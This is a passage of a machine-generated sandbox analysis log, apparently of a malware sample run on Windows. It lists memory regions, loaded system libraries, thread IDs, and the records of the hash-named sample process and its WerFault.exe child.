entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1038 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1039 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1040 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1041 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1042 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1043 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1044 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1045 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1046 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1047 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1048 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1049 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1050 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1051 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1052 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1053 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1054 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1055 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1056 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1057 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1058 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1059 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1060 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1061 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1062 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1063 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1064 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1065 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1066 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1067 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1068 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1069 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1070 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1071 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1072 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1073 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1074 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1075 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1076 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1077 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1078 start_va = 0x630000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1079 start_va = 0x670000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1080 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1081 start_va = 0x770000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 1082 start_va = 0x410000 end_va = 0x411fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "faultrep.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\faultrep.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\faultrep.dll.mui") Region: id = 1083 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1084 start_va = 0x6c510000 end_va = 0x6c92dfff monitored = 0 entry_point = 0x6c60ee80 region_type = mapped_file name = "dbgeng.dll" filename = "\\Windows\\SysWOW64\\dbgeng.dll" (normalized: "c:\\windows\\syswow64\\dbgeng.dll") Region: id = 1085 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1086 start_va = 0x6b120000 end_va = 0x6b18ffff monitored = 0 entry_point = 0x6b174b90 region_type = mapped_file name = "dbgmodel.dll" filename = "\\Windows\\SysWOW64\\DbgModel.dll" (normalized: "c:\\windows\\syswow64\\dbgmodel.dll") Region: id = 1087 start_va = 0x70040000 end_va = 0x7006cfff monitored = 0 entry_point = 0x70052b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 1088 start_va = 0x7f0000 end_va = 0x8d9fff monitored = 0 entry_point = 0x82d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1089 start_va = 0x6cc40000 end_va = 0x6cc49fff monitored = 0 entry_point = 0x6cc43200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1090 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1091 start_va = 0x70030000 end_va = 0x70037fff monitored = 0 entry_point = 0x700317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1092 start_va = 0x7f0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 1093 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1094 start_va = 0x6060000 end_va = 0x6396fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1095 start_va = 0x630000 end_va = 0x631fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1096 start_va = 0x630000 end_va = 0x633fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1097 start_va = 0x630000 end_va = 0x635fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1098 start_va = 0x630000 end_va = 0x637fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1099 start_va = 0x63a0000 end_va = 0x649ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063a0000" filename = "" Region: id = 1100 start_va = 0x630000 end_va = 0x639fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1101 start_va = 0x630000 end_va = 0x63bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1102 start_va = 0x630000 end_va = 0x63dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1103 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1104 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1105 start_va = 0x630000 end_va = 0x643fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1106 start_va = 0x630000 end_va = 0x645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1107 start_va = 0x630000 end_va = 0x647fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1108 start_va = 0x630000 end_va = 0x649fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1109 start_va = 0x630000 end_va = 0x64bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1110 start_va = 0x630000 end_va = 0x64dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1111 start_va = 0x630000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1112 start_va = 0x630000 end_va = 0x651fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1113 start_va = 0x64a0000 end_va = 0x659ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064a0000" filename = "" Region: id = 1114 start_va = 0x65a0000 end_va = 0x667ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1115 start_va = 0x6680000 end_va = 0x674dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006680000" filename = "" Region: id = 1116 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1117 start_va = 0x640000 end_va = 0x642fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wer.dll.mui") Region: id = 1118 start_va = 0x650000 end_va = 0x653fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1119 start_va = 0x6680000 end_va = 0x6e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006680000" filename = "" Region: id = 1120 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1121 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1122 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1123 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1124 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1125 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1126 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1127 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1128 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1129 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1130 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1131 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1132 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1133 start_va = 0x6680000 end_va = 0x677ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006680000" filename = "" Region: id = 1134 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1135 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1136 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1137 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1138 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1139 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1140 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1141 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1142 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1143 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1144 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1145 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1146 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1147 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1148 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1149 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1150 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1151 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1152 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1153 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1154 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1155 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1156 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1157 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1158 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1159 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1160 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1161 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1162 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1163 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1164 start_va = 0x660000 end_va = 0x66afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Thread: id = 25 os_tid = 0xd20 Thread: id = 26 os_tid = 0xbcc Thread: id = 27 os_tid = 0x3ac Process: id = "8" image_name = "f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" page_root = "0x565b5000" os_pid = "0x8b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" " cur_dir = "C:\\Windows\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "9" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x37dd3000" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1468 -s 1068" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1188 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1189 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1190 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1191 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1192 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1193 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1194 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1195 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1196 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1197 start_va = 0x8f0000 end_va = 0x932fff monitored = 0 entry_point = 0x910f50 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\SysWOW64\\WerFault.exe" (normalized: "c:\\windows\\syswow64\\werfault.exe") Region: id = 1198 start_va = 0x940000 end_va = 0x493ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 1199 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1200 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1201 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1202 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1203 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 1204 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1205 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 1206 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1207 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1208 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1209 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1210 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1211 start_va = 0x400000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1212 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1213 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1214 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1215 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1216 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1217 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1218 start_va = 0x510000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1219 start_va = 0x550000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1220 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1221 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1222 start_va = 0x74b50000 end_va = 